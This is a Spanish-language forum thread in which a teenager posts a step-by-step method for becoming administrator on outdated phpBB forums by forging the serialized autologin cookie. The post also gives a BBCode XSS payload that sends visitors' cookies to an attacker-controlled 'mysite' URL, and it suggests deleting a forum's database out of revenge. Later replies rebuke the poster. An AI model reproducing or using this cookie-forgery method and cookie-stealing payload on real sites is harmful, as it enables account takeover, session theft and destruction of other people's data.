HaCk bAsico

Cerrado
[chulito] [chulito] ola compañeros :


Yo no esque sea hacker ni nada de eso , solo tengo 17 años . pero he descubierto un truquillo que alomjor a gente de esta pagina les interesaria, tambien como alos administradores de sus propios foros:

Bueno al grano ¿ Ustedes sabian que existe" un bug para entrar como administrador en un foro ( siempre k sea phb o phbb) por la cookie?
Pues mira para todos los aficionados ala informatica:

solo tienes que vjete un programa llamdo iecv.exe

este programa lo que ace es descodificar la cookies y alamacenarlas en la base de datos entonces cuando nosotros entramos en un foro con una version antigua de phb o phbb inferior al 2005 , pulsamos sobre estre programa y buscamos automaticamente la pagina.

entonces clikeamos sobre ella y abajo aparecera generalmnete 2 archivos que pondran KEY(phb...)tal y la cookie entonces cojemos la primer achivo y ponemos con el boton izkierdo editar

y substituimos la cookie por :

a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}

Donde el ultimo 2 de la izkierda es el numero del user, y el ultimo 1 de la derecha el numero de cifras que contiene el user.

Por ejemplo para entrar con el user numero 97 la cookie quedaria asi:

a:2:{s:11:"autologinid";b:1;s:6:"userid";s:2:"97";}

Bien una vez hemos cambiado la cookie, cerramos el Internet explorer, y lo habrimos de nuevo, colocamos la url del foro y automaticamente estaremos logeados como Admin.

Tener en cuenta de que muchisimos foros ya se descargaron el parche pero muchisimos mas estan sin actualizar.
Nada mas que decir, que una vez seas admin pudes hacer 2 cosas dejar un mensajito diciendo que lo parcheen, o si te hicieron algo anteriormente... borrar la bd del foro. (En este caso se lo merecian)

IE= Internet Explorer
Iecv= Programa que sirve para modificar el contenido de una cookie
cookie=archivo donde se almacena informaci??e una p?na especifica, tal como la autentificacion (login i pass)


Sirve para logearte como admin y poder cargarte el foro ( ejemplo )

bueno veo que aqui la cosa hoy en dia los cookis de los foros en PHPBB han mejorado no esta facil hacer el cambio ahora con solo
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}

bueno esto lo puede sacar de otros foros
a:2:{i:6;i:1128353448;i:10;i:1128354456;}

a:3:{i:0;s:4:"9586";i:1;s:32:"43455418f655e8c35244 c443jb7a6df4af";i:2;i:1316631134;}

bueno ahora creo que hay una forma para los foros PHPbb2.0.16
con esta linea


Código:
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'

aqui una pregunta donde dice que tengo que poner mi domain debe haber alguna configuracion en el Dominio... como hace para la grabacion de los cookies capturados..
pero nose este tipo de codigos aun no los e provado ya que existe otra forma mas dificil que es la de modificar el codigo de fuente o de HTml pero claro ay que saber codigo.



weno espero que le hayan servido para algo y en cuanto alos administradores de su foro con version antigua de phb o phbb mejor que lo parxeen ok?? weno les dejo adios..
[plas]
[plas]
Anda, ponte a estudiar las asignaturas del Instituto!
¿Te parece bonito que por un bug, accedas a un foro y les borres la BD? ¿Y eso es Hacking?, haz caso ReinRaus y dedícate a estudiar las asignaturas de tu Instituto. Esto no es un foro de Cracking, sino de Software Libre. Aquí no se hace nada ilegal.
Felicidades, ya eres todo un script kiddie

Haznos un favor y dedícate a algo de provecho
3 respuestas
Cerrado
Volver a Software libre